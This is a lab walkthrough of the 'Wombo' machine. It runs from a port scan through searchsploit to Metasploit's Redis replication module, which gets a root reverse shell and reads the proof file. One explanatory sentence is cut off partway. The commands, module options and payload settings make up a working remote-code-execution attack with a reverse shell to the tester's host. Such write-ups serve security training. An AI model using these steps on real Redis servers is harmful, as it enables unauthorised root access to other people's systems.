PG - Wombo Walkthrough¶
TL ; DR
- Exploit Redis to get RCE
Enumeration:¶
Port Scan¶
Start with Nmap to find out the services running on the target machine.
$ nmap -sVC -T4 -v -p- -oN nmapFull.txt $ip
Nmap scan report for 192.168.212.69
Host is up (0.24s latency).
Not shown: 65529 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 09:80:39:ef:3f:61:a8:d9:e6:fb:04:94:23:c9:ef:a8 (RSA)
| 256 83:f8:6f:50:7a:62:05:aa:15:44:10:f5:4a:c2:f5:a6 (ECDSA)
|_ 256 1e:2b:13:30:5c:f1:31:15:b4:e8:f3:d2:c4:e8:05:b5 (ED25519)
53/tcp closed domain
80/tcp open http nginx 1.10.3
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.10.3
|_http-title: Welcome to nginx!
6379/tcp open redis Redis key-value store 5.0.9
8080/tcp open http-proxy
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 3 disallowed entries
|_/admin/ /reset/ /compose
|_http-title: Home | NodeBB
27017/tcp open mongodb MongoDB 4.0.18
Searchsploit¶
From the scan, we notice a Redis service (v5.0.9) running on the target system. Perform a quick search using searchsploit to see if that particular version of Redis has any vulnerability.
$ searchsploit redis 5
--------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------- ---------------------------------
Microsoft Windows 10 - Diagnostics Hub Standard Co | windows/local/45244.txt
Redis 4.x / 5.x - Unauthenticated Code Execution ( | linux/remote/47195.rb
Redis 5.0 - Denial of Service | linux/dos/44908.txt
Redis-cli < 5.0 - Buffer Overflow (PoC) | linux/local/44904.py
--------------------------------------------------- ---------------------------------
Shellcodes: No Results
Exploitation¶
Using Metasploit:¶
Use the module linux/redis/redis_replication_cmd_exec and set options as follows.
$ msfconsole
...
msf5 > use linux/redis/redis_replication_cmd_exec
msf5 exploit(linux/redis/redis_replication_cmd_exec) > show options
Module options (exploit/linux/redis/redis_replication_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CUSTOM true yes Whether compile payload file during exploiting
PASSWORD foobared no Redis password for authentication test
RHOSTS 192.168.212.69 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 6379 yes The target port (TCP)
SRVHOST 192.168.83.129 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 6379 yes The local port to listen on.
Payload options (linux/x64/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.83.129 yes The listen address (an interface may be specified)
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
lport so it doesn't get blocked by firewall. After setting up the required options run the exploit and wait for the shell
msf5 exploit(linux/redis/redis_replication_cmd_exec) > run
[*] Started reverse TCP handler on 192.168.83.129:8080
[*] 192.168.212.69:6379 - Compile redis module extension file
[+] 192.168.212.69:6379 - Payload generated successfully!
[*] 192.168.212.69:6379 - Listening on 192.168.83.129:6379
[*] 192.168.212.69:6379 - Rogue server close...
[*] 192.168.212.69:6379 - Sending command to trigger payload.
[*] Command shell session 2 opened (192.168.83.129:8080 -> 192.168.212.69:59796) at 2020-04-24 15:19:25 +0800
[!] 192.168.212.69:6379 - This exploit may require manual cleanup of './fkyrakg.so' on the target
whoami
root
cat proof.txt
<Redacted>